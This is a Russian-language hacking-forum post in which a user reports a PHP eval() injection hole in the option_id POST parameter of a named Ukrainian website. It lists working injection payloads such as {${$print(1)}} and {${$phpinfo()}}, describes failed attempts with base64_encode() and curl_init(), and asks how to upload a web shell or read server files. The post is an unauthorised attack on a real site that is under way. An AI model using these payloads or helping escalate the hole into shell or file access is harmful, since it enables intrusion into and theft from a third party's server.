
16.07.2013, 23:48
|
|
Новичок
Регистрация: 03.02.2013
Сообщений: 13
С нами:
6985046
Репутация:
0
|
|
Нашел уязвимость в POST параметре option_id на сайте
http://www. shans.com. ua/
HackBar'ом передаю POST запрос
option_id={${$print(1)}}{${$print(1)}}{${$print(1) }}
option_id={${$phpinfo()}}
Скрипт отрабатывает.... Данные передаются в eval()
Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init()....
Непойму почему данные передаются в "{}" без ";"
Вот так не работает {${$a=1; $print($a);}...
А так выводит данные - {${$a=1}}{${$print($a)}}
в гугле не нашел как выглядит данный скрипт...
Если есть чтото подобное киньте ссылку...
|
|
|